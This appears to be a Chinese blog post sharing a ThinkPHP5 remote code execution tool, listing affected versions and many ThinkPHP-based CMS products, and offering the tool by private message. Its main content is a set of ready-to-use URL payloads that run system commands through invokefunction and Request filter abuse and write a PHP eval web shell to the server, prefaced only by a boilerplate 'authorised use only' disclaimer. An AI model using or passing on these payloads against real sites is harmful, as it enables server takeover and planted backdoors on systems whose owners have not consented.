有人私信问我这个工具,现在就分享给大家!
该工具只能授权验证网站漏洞和站长验证漏洞使用。
禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关。
影响范围
- 5.x < 5.1.31
- 5.x <= 5.0.23
以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。
- AdminLTE后台管理系统
- layui后台管理系统
- thinkcmf
- H-ui.admin后台管理系统
- tpshop
- FsatAdmin
- eyoucms
- LarryCMS后台管理系统
- tpadmin后台管理系统
- snake后台管理系统
- ThinkSNS
- DolphinPHP后台管理系统
- WeMall商城系统
- CLTPHP
- 齐博CMS
- DSMALL
- YFCMF
- HisiPHP后台管理系统
- Tplay后台管理系统
- lyadmin后台管理系统
- haoid后台管理系统
漏洞验证
命令执行
getshell
下载地址:私信我关键字“getshell”自动获取下载链接
附上测试代码
#代码执行 ?s=index/\think\Request/input&filter=phpinfo&data=1 #命令执行 ?s=index/\think\Request/input&filter=system&data=系统命令 #getshell ?s=index/\think\template\driver\file/write&cacheFile=paylog.php&content=%3C?php%20eval($_POST[20208]);?%3Ehacker #getshell2 ?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E #代码执行 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 #命令执行 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令 #代码执行 ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 #命令执行 ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=系统命令
本文暂时没有评论,来添加一个吧(●'◡'●)